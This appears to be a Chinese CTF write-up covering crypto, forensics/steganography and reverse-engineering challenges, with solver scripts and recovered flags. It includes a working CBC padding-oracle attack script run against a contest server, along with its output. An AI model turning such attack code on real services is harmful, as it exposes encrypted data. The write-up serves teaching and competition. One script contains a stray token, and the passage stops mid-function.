CRYPTO
010101
漏洞点在
# Challenge code as quoted in the writeup. Step one flips a random '1' of p1
# to '0'; step two picks a random position at which p1 (after that flip)
# holds '0' and sets p2 at that position to '1' -- note the second index is
# drawn from p1, not from p2.
one_positions = [idx for idx, bit in enumerate(p1) if bit == '1']
p1[random.choice(one_positions)] = '0'
zero_positions = [idx for idx, bit in enumerate(p1) if bit == '0']
p2[random.choice(zero_positions)] = '1'
p1只是随机的把1的位置转一个变成0,p2把0的位置随机转一个到1,直接逆回去即可
charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext16019317455682494995107595480323300301281684269012730701351084808534606861097128732387692056733235739412227197845372269245749475979859953325021664476734410014720575731925904251102442593366655668403990263995510181013967125954239625175574645528880102887522025817986086352977570193007925691015284660139223253228220926464455493650171833363306828825533183970870645343702260455069648577546810721443364714233897615935934061182371641485196971610941014551486749274990733592988218858582639685570222798909493131516292569896347886656702446663175379068445062433265887249121442843081298854979379309044313820236565465696783078902210984042378781107180522174145335181877185771417778786182565494016061073801247741867209575064278503975173367714279328270813546483805238498696044690583098990834784211919036346860413402581575433895652371104211107933523943509360601463071774985572704821763014944680693421537000199726125219694414715351566045540338629545939715947600874065078335187587078863350014327385920433498197661125807679619403475838017715901218100497835243145772103695402701587994437072004662725124293482700335262949601981312589614366480254708418472993474202513303919807797524074940590380140714449067896194906509099072762940779370480589405622367996909171011011001111001001011010001110110111000111001011100111111011010010111111001110011101010010111110100001001000100011101100001000010011110100000001101110111001111110010101100101011011000011101011110111010111010100101010010101100111011110111110111100011110010000101011110011001110111001111000010110010001111101110000100100110011000110111110110110110110000010100111101111110100100000111101011110000110001000101110100110101101000111011000010010001110011001010011111010100100111011111011011111000000000001100100110101011000000001001000011010010011001011010100000011111001010100101010001100
01110000000000100100001011110000111110000101100101110110010001000110010010110001011110100111001011001001000111110110001010100001110111000000010110100101011011011011101011000100001111001111111010100011101000001111001111100001000001011100101111010000000111101111101000010101110110110010000111011001010010110000011001100000000111011100111111010000110010101010001110100100001010100101011011101111111101010000000010111110111110001110011101101010011000010000000101100100010101110000000000010011010000100010111110100101001001010000000001111001110011110111110111110000000010011011010000100111110100010111010100110111001110000010110010010011010010101000001100101001111100100100111101100101101111000011101110101010101010101110010001011100011101111111001100100111011111011011110010001101100100010111100110100000000111111000101101000011101011010100011001010010110100110100010110111011010101111110100000000010000001011001101101000111100011010101101001101110101111100110010011010111001110000101000100010011100000010001111011100100101000001110110101001101011101101000000011001000011010010011001011101000010000110100101100010001101111100000010010101100011001010000010000000101101010001111001000010100000101110111000101110110100100010100110111000010110001010001010101101001000010011100000010010110000111011001000110110111000010111001000011000001001110000110000100010000111100111110000111110110001010011101110000001001111010100010101001000001010010100101101100000110100110001001100113639741957721452316976500773100864937092070232127542889772994773564014497673678846855074974390573154760588872825226516857739857722943445362351665244776632928074165700293157331795285773795044212555622984077281565861021014031785899405567882333479222154731086326424132166836545887300907286953530144770952091830545531131348306621103726659289579737156714463334440930922185072153960387877465278759796433396879455697305518063131565687468124683424824865462096245006793059295786127430254243848165932477966977300997290389723864051540498702842027
33894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581
exp
from gmpy2 import *
from Crypto.Util.number import *
from tqdm import *

# Values copied from the challenge output: the modulus n, the leaked
# 2048-character bit string p (first 1024 bits = p1, last 1024 = p2, each
# with one bit flipped by the challenge) and the ciphertext c.
n = 601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917
p = (
    '1011011001111001001011010001110110111000111001011100111111011010010111111001110011101010010111110100001001000100011101100001000010011110100000001101110111001111110010101100101011011000011101011110111010111010100101010010101100111011110111110111100011110010000101011110011001110111001111000010110010001111101110000100100110011000110111110110110110110000010100111101111110100100000111101011110000110001000101110100110101101000111011000010010001110011001010011111010100100111011111011011111000000000001100100110101011000000001001000011010010011001011010100000011111001010100101010001100011100000000001001000010111100001111100001011001011101100100010001100100101100010111101001110010110010010001'
    '1111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'
)
c = 363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

# Search that recovered the prime from the leaked bit string (left disabled;
# the value it found is hard-coded below). It tries every way of setting one
# '0' of p1 back to '1' and one entry of p2 back to '0', and keeps the
# candidate that divides n.
# p1 = p[:1024]
# p2 = p[1024:]
# pp1 = [i for i, c in enumerate(p1) if c == '0']
# pp2 = [i for i, c in enumerate(p1) if c == '1']
# print(pp1)
# for i in tqdm(pp1):
#     p1 = list(p[:1024])
#     p1[i] = '1'
#     for j in pp2:
#         p2 = list(p[1024:])
#         p2[j] = '0'
#         ppp = ''.join(p1) + ''.join(p2)
#         ppp2 = int(ppp, 2)
#         if n % ppp2 == 0:
#             print(ppp2)
#             break

# Prime produced by the search above; it replaces the bit-string `p`.
p = 23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827
print(isPrime(p))

# Plain RSA decryption with the recovered factor.
q = n // p
e = 0x10001
phi = (p - 1) * (q - 1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'
POA
cbc padding attack
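from pwn import *
from hashlib import sha256
import string
from pwnlib.util.iters import mbruteforce
import binascii

r = remote("124.71.177.14", 10010)

table = string.ascii_letters + string.digits


def solve_pow():
    """Answer the service's proof-of-work prompt.

    Reads the 16-character suffix and the target SHA-256 digest from the
    banner, brute-forces a 4-character prefix over ``table`` such that
    sha256(prefix + suffix) matches, and sends the prefix back.
    (Renamed from ``pow``, which shadowed the builtin.)
    """
    r.recvuntil("XXXX + ")
    suffix = r.recv(16).decode("utf8")
    r.recvuntil(":")
    cipher = r.recvline().strip().decode("utf8")
    proof = mbruteforce(
        lambda x: sha256((x + suffix).encode()).hexdigest() == cipher,
        table,
        length=4,
        method='fixed',
    )
    r.sendline(proof)


solve_pow()
r.sendline('1')
r.recvuntil('This is your flag: ')
c = r.recvuntil('\n', drop=True)
print('c=', c)
# The service hands back hex(IV || ciphertext); the first 16 bytes are the IV.
iv = c[:32]
cipher = c[32:]
enc = binascii.unhexlify(cipher)
iv = binascii.unhexlify(iv)
print('enc=', enc)
print('iv=', iv)

# Recover the first plaintext block byte by byte, last byte first, using the
# service's padding-validity answer (b'True' in the reply) as the oracle.
pt = bytearray(b'\x00' * 16)
for make_pad_len in range(1, 17):
    # iv XOR pt = the block-cipher output for this block; only the entries
    # at index >= `index` are known (already recovered) at this point.
    xored_iv = bytearray(16)
    for i in range(16):
        xored_iv[i] = iv[i] ^ pt[i]
    index = 16 - make_pad_len
    for i in range(0x100):
        _iv = bytearray(16)
        # Make every already-recovered tail byte decrypt to the pad value.
        for j in range(index, 16):
            _iv[j] = xored_iv[j] ^ make_pad_len
        _iv[index] = i
        ivv = (bytes(_iv) + enc).hex()
        r.sendline('2')
        r.recvuntil('Please enter ciphertext:\n')
        print('ivv=', ivv)
        r.send(str(ivv))
        res = r.recvuntil('\n')
        if b'True' in res:
            v = i ^ iv[index] ^ make_pad_len
            pt[index] = v
            print(chr(v), pt.hex(), bytes(pt))
            break
r.interactive()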
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}\x04\x04\x04\x04'[*] Switching to interactive mode
D0g3{0P@d4Ttk}
Rabin
第一步爆破x,获得r,从而n1=n//r=p*q
第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q
第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}
第四步,根据relation(),以及第一步,判断x比较可能是8,根据e2,爆破e1是2,rabin解密得到第一段D0g3{82309bce-9db6-53
最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
Python代码如下:
from Crypto.Util.number import *
from gmpy2 import *

# Values copied from the challenge.
#   n      - public modulus; the script later checks that n == p * q * r
#   inv_p  - the leaked value later asserted to equal invert(p, q)
#   inv_q  - the leaked value later asserted to equal invert(q, p)
#   c1, c2 - the two ciphertexts (first part is Rabin, second part is RSA
#            with a small exponent, per the writeup text above)
n = 2853330975605798568927355675890274914552818166765484829048795844110848404506052718992363357873782124576444805384893339571996810050513247633170619144453351846436256120968625432861341028028575493769685484601424752315752937846949485842928523694407350479796840883682824945004347271385608700021951370144891671656273316323684550591069464927101120456171833710207449829601089178840389332435532933768289963871827397691327921224968767990564124504802959392412424934683396497027979156854080562055026608791291304985459214106346196592811244749523285203263777328613278854608257856636120838506982992518605685007984636588630760472732180298646581928653759242063289151819829845622505169429872327063499113922651262072555348661903770143808554359182200229829381620598644406830447755238889911882030064799117660738541544601301651131775840721094035345829134308069126086265701892301385789266127390707446833686888508865270944636676688253072463594366352338115273742464632999416619768461686593551183499920076389083631686307242749 51
inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086
inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480
c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528
c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505
# Factors recovered earlier (see the search loops at the end of the script).
r = 10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087
p = 172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499
q = 158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627

# Sanity checks: the leaked inverses must be the CRT coefficients of p and q,
# and the three factors must multiply back to n.
assert inv_p == invert(p, q)
assert inv_q == invert(q, p)
assert n == p * q * r

n1 = n // r
# 2 · 3^2 · 71   (note carried over from the original script; presumably a factorisation hint - TODO confirm)
phi = (p - 1) * (q - 1)


def test(m):
    """Return 1 when every byte of m lies in 30..128 inclusive, else 0."""
    return 1 if all(30 <= byte <= 128 for byte in m) else 0


def relation(e1, e2):
    """Return True when sum(e1**i for i < 5) == sum(e2**j for j < 3).

    This is the relation between the two exponents that the writeup searches
    over; the original wrote the upper bound 5 as ``8 - (2**2 - 1)``.
    """
    lhs = sum(e1 ** i for i in range(5))
    rhs = sum(e2 ** j for j in range(3))
    return lhs == rhs


print(phi)
e1 = 2
e2 = 5

# Rabin decryption of c1: a square root of c1 modulo p and modulo q, then the
# four CRT combinations. (The exponent (p + 1) // 4 is only a square root when
# p, q are 3 mod 4 - not checked here.)
mp = pow(c1, (p + 1) // 4, p)
mq = pow(c1, (q + 1) // 4, q)
a = (inv_p * p * mq + inv_q * q * mp) % n1
b = n1 - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % n1
d = n1 - int(c)
for root in (a, b, c, d):
    print(long_to_bytes(root))
exit()
exit()

# Everything below is the exploratory search code that was run earlier; it is
# unreachable now (the exit() calls above stop the script) and kept for
# reference. Each stage ends with its own exit().

# Find the e1 candidates that satisfy relation(e1, e2).
for cand in range(1, 600):
    if relation(cand, e2):
        print(cand)
exit()

# D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
from tqdm import tqdm

# Try small e2 values as RSA exponents on c2 and keep the one whose plaintext
# starts with printable bytes and contains a closing brace.
for cand in tqdm(range(4, 6)):
    if gcd(cand, phi) > 1:
        continue
    d = invert(cand, phi)
    m = long_to_bytes(pow(c2, d, n1))
    if b"}" in m[:30] and test(m[:10]) == 1:
        print(cand, m)
exit()

# Recover r by brute force over x: grow r = 2 * x**k until it exceeds 1024
# bits and r - 1 is prime, then check whether that prime divides n.
for x in range(2, 100):
    r = 2
    print("begin", x)
    while True:
        r = r * x
        if r.bit_length() > 1024 and isPrime(r - 1):
            r = r - 1
            break
    if n % r == 0:
        print(x, r)
MISC
dacongのWindows
桌面flag3一串PBE
根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc
aes解出flag3
document下secret.rar
rstudio恢复出来解压有点问题,用vol3
一堆空白
很明显的snow了
拿到flag2
提示music
dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去
39.wav拿到flag1
拼接flag
flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}
签到处
D0g3{We1come_TO_AXB_F1111@g}
Nahida
reverse jpg
文件尾
反复提到眼睛,猜测silenteye。那个你一直在寻找的答案,早已出现在你的旅途,fuzz后指的是密码是题目名
dacongのsecret
png fft拿到第一个密码
同样套路,jpg文件尾reverse 压缩包
又要密码
回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)
将19chunk块拿出来,补个png文件头(直接用题目png的文件头)
爆破一下宽高,860*123拿到key
解压后,一眼base64隐写
拿到pass,fuzz后是上一个jpg的jphs,拿到flag
疯狂的麦克斯
1.将docx文件转换为zip提取隐藏文件
2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号
3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文
使用rot13并将amount设置为22后密文解密后得到THIS IS MKS DO YOU KNOW WHOAMI
4.将列表也进行同样的解密,根据题目描述,只要将列表每一个值进行base64加密后,就可以在其中找到正确的压缩包密码
脚本如下
import base64
lst = ['71132E', '328051N', '248199O'...]
# Encoding helper (the original comment called this an "encryption
# function"; base64 is a reversible encoding, not encryption).
def encrypt_string(string):
    """Return the base64 text of *string* after UTF-8 encoding it."""
    raw = string.encode('utf-8')
    return base64.b64encode(raw).decode('utf-8')
# Write the base64 form of every list entry, one per line, to output.txt;
# the writeup then tries these lines as the archive password.
with open('output.txt', 'w') as file:
    file.writelines(encrypt_string(value) + '\n' for value in lst)
爆破
解压压缩包得到flag
REVERSE
MobileGo
libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023
之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换
解密脚本如下,首先通过Go语言生成伪随机数
package main

import (
	"fmt"
	"math/rand"
)

// main reproduces the challenge's swap sequence: a math/rand source seeded
// with 2023 yields 0x26 pairs of indices in [0, 0x26), printed as "[a,b],"
// so they can be pasted into the Python un-shuffle script that follows.
func main() {
	rng := rand.New(rand.NewSource(2023))
	for round := 0; round < 0x26; round++ {
		first := rng.Intn(0x26)
		second := rng.Intn(0x26)
		fmt.Printf("[%d,%d],", first, second)
	}
}
然后从后往前还原,密文从Android的资源文件中提取
# Shuffled flag bytes taken from the app's resource file (38 bytes).
flag = bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")
# Swap pairs in the order the Go program above prints them.
key = [[11, 14], [15, 37], [24, 18], [8, 30], [6, 9], [30, 3], [29, 9], [4, 13], [13, 24], [37, 1], [28, 28], [3, 1], [23, 22], [21, 26], [7, 19], [1, 34], [37, 17], [27, 29], [31, 30], [14, 2], [35, 34], [4, 27], [9, 3], [3, 24], [30, 29], [3, 27], [14, 25], [26, 0], [4, 28], [5, 15], [9, 9], [13, 18], [24, 3], [35, 24], [36, 27], [25, 21], [11, 4], [27, 28]]
# The app applied the swaps front to back, so undo them back to front.
for first, second in reversed(key):
    flag[first], flag[second] = flag[second], flag[first]
print(flag)
D0g3{4c3b5903d11461f94478b7302980e958}
你见过蓝色的小鲸鱼
通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密
from Crypto.Cipher import Blowfish

# Per the writeup, the username is used directly as the Blowfish key and the
# ciphertext was extracted from the binary; ECB, one 16-byte ciphertext.
key = b'UzBtZTBuZV9EMGcz'
enc = b"\x11\xA5\x1F\x04\x95\x50\xE2\x50\x8F\x17\xE1\x6C\xF1\x63\x2B\x47"
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
print(cipher.decrypt(enc))
# QHRoZWJsdWVmMXNo
牢大想你了
反编译Assembly-CSharp.dll文件
其中GameManager.OnValueChanged对输入完成TEA加密
解密脚本如下
#include <stdint.h>
#include <stdio.h>
#include <string.h>
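/* Undo 32 rounds of TEA on one 64-bit block (v[0], v[1]) in place.
 * TEA relies on exact 32-bit wrap-around, so the state is uint32_t rather
 * than the original's `unsigned int`. */
static void tea_decrypt_block(uint32_t v[2], const uint32_t key[4])
{
    const uint32_t delta = 0x9e3779b9;
    uint32_t sum = delta * 32;      /* wraps to 0xC6EF3720, as in the original */
    uint32_t v0 = v[0], v1 = v[1];
    for (int round = 0; round < 32; ++round) {
        v1 -= ((v0 << 4) + key[2]) ^ (v0 + sum) ^ ((v0 >> 5) + key[3]);
        v0 -= ((v1 << 4) + key[0]) ^ (v1 + sum) ^ ((v1 >> 5) + key[1]);
        sum -= delta;
    }
    v[0] = v0;
    v[1] = v1;
}

/* Decrypt the six ciphertext blocks pulled from GameManager.OnValueChanged
 * with the constant key 0x11111111 x4 and print the plaintext bytes. */
int main()
{
    uint32_t Data[12] = { 3363017039U, 1247970816U, 549943836U, 445086378U, 3606751618U, 1624361316U, 3112717362U, 705210466U, 3343515702U, 2402214294U, 4010321577U, 2743404694U };
    uint32_t key[4] = { 286331153, 286331153, 286331153, 286331153 };
    for (int i = 0; i < 12; i += 2) {
        tea_decrypt_block(&Data[i], key);
        /* Emit the 8 decrypted bytes in memory order - the same bytes the
         * original's eight %c conversions printed (little-endian assumed,
         * as the original did). */
        fwrite(&Data[i], 1, 8, stdout);
    }
    return 0;
}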
结果为 it_is_been_a_long_day_without_you_my_friend
你好,PE
找到关键代码,有点像CRC64
搜了个脚本一把梭
import struct
def decode_k(v):
    """One round of the decode step that decode_j repeats 64 times.

    When the low bit of v is set, the constant 0x54AA4A9 is XORed in before
    the right shift and the top (bit 63) is set afterwards; otherwise the
    value is simply shifted right by one.
    """
    if not (v & 1):
        return v >> 1
    return ((v ^ 0x54AA4A9) >> 1) | 0x8000000000000000
# 48 bytes lifted from the binary, split into six little-endian u64 words.
g_key = bytearray.fromhex('4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000')
single_len = 8
g_output = [
    struct.unpack('<Q', g_key[offset:offset + single_len])[0]
    for offset in range(0, 6 * single_len, single_len)
]
def decode_j(v):
    """Apply decode_k to v 64 times and return the result."""
    for _ in range(64):
        v = decode_k(v)
    return v
# Decode every word, re-pack it little-endian and read the bytes as text.
decoded = [decode_j(word) for word in g_output]
flag = [struct.pack('<Q', word).decode() for word in decoded]
print(''.join(flag))
# D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}
感觉有点点简单
主函数获取数据后进行魔改rc4和魔改base64加密
rc4魔改了sbox的大小和最后异或结果
base64魔改了表和位运算的操作
解密脚本
#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
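/* Return the index of c in base64_map, or 0xFF when c is not in the table.
 * (The original fell off the end of the function in that case, which is
 * undefined behaviour; callers only pass characters of the custom alphabet.)
 * strchr would match the terminating NUL, so that case is excluded first. */
unsigned char findPos(const unsigned char* base64_map, unsigned char c)
{
    if (c == '\0')
        return 0xFF;
    const char* hit = strchr((const char*)base64_map, (int)c);
    if (hit == NULL)
        return 0xFF;
    return (unsigned char)(hit - (const char*)base64_map);
}

/* Decode the challenge's modified base64.
 *
 * Differences from standard base64: a custom 64-character alphabet, and the
 * three bytes of each 4-character group are assembled with a different bit
 * layout (the standard layout is given in the comment inside the loop).
 * One '=' or "==" of trailing padding is honoured.
 *
 * Returns a malloc'ed, NUL-terminated buffer that the caller must free(),
 * or NULL when code0 is NULL, empty, not a multiple of 4 characters long,
 * or when malloc fails. */
unsigned char* base64_decode(const unsigned char* code0)
{
    const unsigned char* code = code0;
    const unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";
    long len, str_len, flag = 0;
    unsigned char* res;
    unsigned char a[4] = { 0 };

    if (code == NULL)
        return NULL;
    len = (long)strlen((const char*)code);
    if (len == 0 || len % 4 != 0)
        return NULL;

    /* Count the padding characters to size the output. */
    if (code[len - 1] == '=') {
        if (code[len - 2] == '=') {
            flag = 1;                   /* "==": one byte in the last group */
            str_len = len / 4 * 3 - 2;
        } else {
            flag = 2;                   /* "=": two bytes in the last group */
            str_len = len / 4 * 3 - 1;
        }
    } else {
        str_len = len / 4 * 3;
    }

    res = (unsigned char*)malloc((size_t)str_len + 1);
    if (res == NULL)
        return NULL;

    /* Full groups: four alphabet positions -> three bytes, modified layout.
     * Standard base64 would be
     *   res[j]     = a[0] << 2 | a[1] >> 4;
     *   res[j + 1] = a[1] << 4 | a[2] >> 2;
     *   res[j + 2] = a[2] << 6 | a[3];
     */
    for (long i = 0, j = 0; j < str_len - flag; j += 3, i += 4) {
        a[0] = findPos(base64_map, code[i]);
        a[1] = findPos(base64_map, code[i + 1]);
        a[2] = findPos(base64_map, code[i + 2]);
        a[3] = findPos(base64_map, code[i + 3]);
        res[j]     = a[0] | ((a[1] & 0x3) << 6);
        res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
        res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);
    }

    /* Final, padded group (same layout, fewer output bytes). */
    switch (flag) {
    case 0:
        break;
    case 1:
        a[0] = findPos(base64_map, code[len - 4]);
        a[1] = findPos(base64_map, code[len - 3]);
        res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);
        break;
    case 2:
        a[0] = findPos(base64_map, code[len - 4]);
        a[1] = findPos(base64_map, code[len - 3]);
        a[2] = findPos(base64_map, code[len - 2]);
        res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);
        res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
        break;
    }
    res[str_len] = '\0';
    return res;
}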
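/* Modified RC4 state: 64 entries instead of 256 (sboxSize). */
unsigned char sbox[sboxSize] = { 0 };

/* Exchange the bytes at a and b. */
void swap(unsigned char* a, unsigned char* b)
{
    unsigned char tmp = *a;
    *a = *b;
    *b = tmp;
}

/* Key schedule: identity permutation, then the usual RC4 shuffle driven by
 * the key repeated to sboxSize, all arithmetic modulo sboxSize.
 * keyLen <= 0 divided by zero in the original; now the state is simply left
 * as the identity permutation. */
void init_sbox(unsigned char key[], int keyLen)
{
    unsigned char Ttable[sboxSize] = { 0 };
    for (int i = 0; i < sboxSize; i++)
        sbox[i] = (unsigned char)i;
    if (keyLen <= 0)
        return;
    for (int i = 0; i < sboxSize; i++)
        Ttable[i] = key[i % keyLen];
    for (int i = 0, j = 0; i < sboxSize; i++) {
        j = (j + sbox[i] + Ttable[i]) % sboxSize;
        swap(&sbox[i], &sbox[j]);
    }
}

/* Modified keystream generator applied in place to data[0..dataLen).
 * The i/j update and swap are standard RC4 (modulo sboxSize); the keystream
 * byte is (i ^ j) & sbox[((i ^ j) + sbox[i] + sbox[j]) % sboxSize] instead
 * of sbox[(sbox[i] + sbox[j]) % 256]. Encrypting and decrypting are the same
 * call. A negative dataLen now does nothing (the original compared it as
 * unsigned and would have run past the buffer). */
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen)
{
    unsigned char i = 0, j = 0;
    init_sbox(key, keyLen);
    for (int h = 0; h < dataLen; h++) {
        i = (unsigned char)((i + 1) % sboxSize);
        j = (unsigned char)((j + sbox[i]) % sboxSize);
        swap(&sbox[i], &sbox[j]);
        data[h] ^= (i ^ j) & sbox[((i ^ j) + sbox[i] + sbox[j]) % sboxSize];
    }
}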
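/* Decode the string found in the binary with the modified base64, then undo
 * the modified RC4 with the key the writeup uses, and print the result. */
int main()
{
    unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";
    unsigned char* result = base64_decode(BaseData);
    if (result == NULL) {
        fputs("base64_decode failed\n", stderr);
        return 1;
    }
    /* 41 = decoded length of BaseData (56 characters with one '=' of padding). */
    RC4_enc_dec(result, 41, (unsigned char*)"the_key_", 8);
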